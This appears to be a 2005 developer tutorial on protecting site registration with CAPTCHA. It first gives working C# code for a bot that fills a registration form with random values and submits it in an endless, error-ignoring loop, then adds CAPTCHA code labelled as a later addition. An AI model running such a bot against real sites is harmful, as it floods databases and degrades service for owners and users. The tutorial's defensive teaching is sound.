Prevent attacks on your website

By Prakash Kalakoti

Using a simple example, I'll explain how to stop a program that registers thousands of dummy users in your database and hurts your database and application performance.
Posted: 6 Jul 2005
Introduction

There are many ways of attacking a website, such as SQL injection, script injection and session hijacking, and you'll find lots of articles about them at CodeProject. In this article I explain the use of CAPTCHA (I am not going to explain what CAPTCHA is; search CodeProject or Google if you have not implemented one yet) to stop a computer program from registering dummy users in your database. Using a simple example, I'll show how a program can register thousands of dummy users and hurt your database and application performance.

A sample application that can harm your website:

Here we are going to create a Windows application and run a test. We'll use the classic COM AxSHDocVw.AxWebBrowser control together with MSHTML, which gives Internet Explorer a complete HTML Document Object Model for parsing the page.

In this example, we are using the following Windows ActiveX objects.

  • mshtml.tlb
  • SHDocVw.dll

You can find them in your "windows/system32" directory.

Steps we are going to perform:

  • Step 1 - Grab the registration page using the WebBrowser Control.
  • Step 2 - Using MSHTML we can locate various form fields of the registration page.
  • Step 3 - Generate random fields.
  • Step 4 - Submit the field values to the website for registration.

and we are going to repeat steps 3 and 4 indefinitely :)

Let us assume that a website has a registration form with the following text fields.

  • UserId
  • First Name
  • Last Name
  • Password
  • Confirm Password

And a Submit button. Find the ID of each field: open the registration page in your normal browser and use View Source to look up the ID of each field.

Now let us go to the coding part of this application.

Load the registration page to the WebBrowser at the form load.

private void Form1_Load(object sender, System.EventArgs e)
{
    // get the registration page URL
    string url = "http://localhost:8181/TestApplication1/Registration.aspx";
    Object o = null;
    // fetch the page into the web browser control; the four ref arguments
    // (flags, target frame, post data, headers) are left empty
    WebBrowser1.Navigate(url, ref o, ref o, ref o, ref o);
}

Now the code that registers users in an endless loop:

private void btnRegisterClick_Click(object sender, System.EventArgs e)
{
    // use the HTMLDocument interface of mshtml to simulate the registration process
    mshtml.HTMLDocument obj;
    string tempGuid, userId, firstName, LastName, password = string.Empty;
    // execute an infinite loop
    while (true)
    {
        try
        {
            // get the random values for this user
            tempGuid = System.Guid.NewGuid().ToString();
            userId = tempGuid.Substring(0, 9);
            firstName = tempGuid.Substring(3, 12);
            LastName = tempGuid.Substring(11, 10);
            password = tempGuid.Substring(10, 8);
            // assign the values to the form fields
            obj = (mshtml.HTMLDocument)WebBrowser1.Document;
            obj.getElementById("txtUserId").innerText = userId;
            obj.getElementById("txtFirstName").innerText = firstName;
            obj.getElementById("txtLastName").innerText = LastName;
            obj.getElementById("txtPassword").innerText = password;
            obj.getElementById("txtConfirmPassword").innerText = password;
            // find the submit button and execute its click to post the information
            obj.getElementById("btnSubmit").click();
            // Note: if you can't find the submit button by id, use the following
            // approach and find it by index in the entire HTMLDocument
            /*
               mshtml.HTMLInputElement objbut;
               objbut = (mshtml.HTMLInputElement)obj.all.item("submit", 0);
               objbut.click();
            */
        }
        catch
        {
            // failed :(
            // no problem, we'll try again (try, try until the site dies ..)
        }
    }
}

I think the code above is self explanatory.

Let's come to the solution part

To avoid this type of attack on our website we need to allow only human users to register, not a computer program. The best approach is to write distorted text on the fly onto an image and ask the registrant to type the text shown in the image: a human can read it, but it is very hard for a computer application like the one above to read distorted text from an image.

[Screenshot: a vulnerable registration form.]

[Screenshot: the more secure registration form.]

To know more about CAPTCHA, you can browse The CAPTCHA Project. And to implement CAPTCHA in your web application, you can take the help of various articles published at CodeProject about CAPTCHA.
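The defensive half of the article, as an added example that is not part of the original: a hypothetical ASP.NET WebForms helper (the names CaptchaChallenge, NewChallenge, RenderPng and Verify are mine) that keeps the expected answer on the server in the session, renders the distorted text as a PNG with System.Drawing, and accepts each challenge only once. It assumes a .NET 1.1-era page with a Session and a separate image page that serves the PNG.

```csharp
using System;
using System.Drawing;
using System.Security.Cryptography;
using System.Web.SessionState;
public class CaptchaChallenge // hypothetical helper behind the "more secure" form above
{
    const string SessionKey = "captcha.answer";
    const string Alphabet = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"; // no 0/O or 1/I/l look-alikes
    // Create a fresh challenge, keep it server-side in the session, return it for rendering.
    public static string NewChallenge(HttpSessionState session, int length)
    {
        byte[] rnd = new byte[length];
        new RNGCryptoServiceProvider().GetBytes(rnd); // unpredictable, unlike System.Random
        char[] text = new char[length];
        for (int i = 0; i < length; i++) text[i] = Alphabet[rnd[i] % Alphabet.Length];
        session[SessionKey] = new string(text);
        return new string(text);
    }
    // Draw each glyph with its own tilt over a few stray lines; return the PNG bytes.
    public static byte[] RenderPng(string text)
    {
        Random jitter = new Random(); // distortion only, not security-critical
        using (Bitmap bmp = new Bitmap(40 * text.Length, 60))
        using (Graphics g = Graphics.FromImage(bmp))
        using (Font font = new Font("Arial", 28, FontStyle.Bold))
        using (System.IO.MemoryStream png = new System.IO.MemoryStream())
        {
            g.Clear(Color.White);
            for (int i = 0; i < 6; i++)
                g.DrawLine(Pens.Gray, jitter.Next(bmp.Width), 0, jitter.Next(bmp.Width), bmp.Height);
            for (int i = 0; i < text.Length; i++)
            {
                g.ResetTransform();
                g.TranslateTransform(20 + 40 * i, 30);   // centre of this glyph's cell
                g.RotateTransform(jitter.Next(-30, 31)); // tilt each glyph differently
                g.DrawString(text[i].ToString(), font, Brushes.DarkBlue, -12, -20);
            }
            bmp.Save(png, System.Drawing.Imaging.ImageFormat.Png); // PNG needs a seekable stream
            return png.ToArray();
        }
    }
    // Compare with the stored answer and discard it either way, so a solved
    // challenge cannot be replayed by a loop like the one shown earlier.
    public static bool Verify(HttpSessionState session, string answer)
    {
        string expected = session[SessionKey] as string;
        session.Remove(SessionKey);
        return expected != null && answer != null && string.Compare(expected, answer.Trim(), true) == 0;
    }
}
```

In a hypothetical CaptchaImage.aspx, Page_Load sets Response.ContentType = "image/png" (plus no-cache headers) and calls Response.BinaryWrite(CaptchaChallenge.RenderPng(CaptchaChallenge.NewChallenge(Session, 6))). The registration page's btnSubmit_Click then returns without inserting the user unless CaptchaChallenge.Verify(Session, txtCaptcha.Text) is true.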

Conclusion

With this article I just want to show that we should consider such small things to avoid big disasters later.

Last Updated: 6 Jul 2005
Editor: Smitha Vijayan
Copyright 2005 by Prakash Kalakoti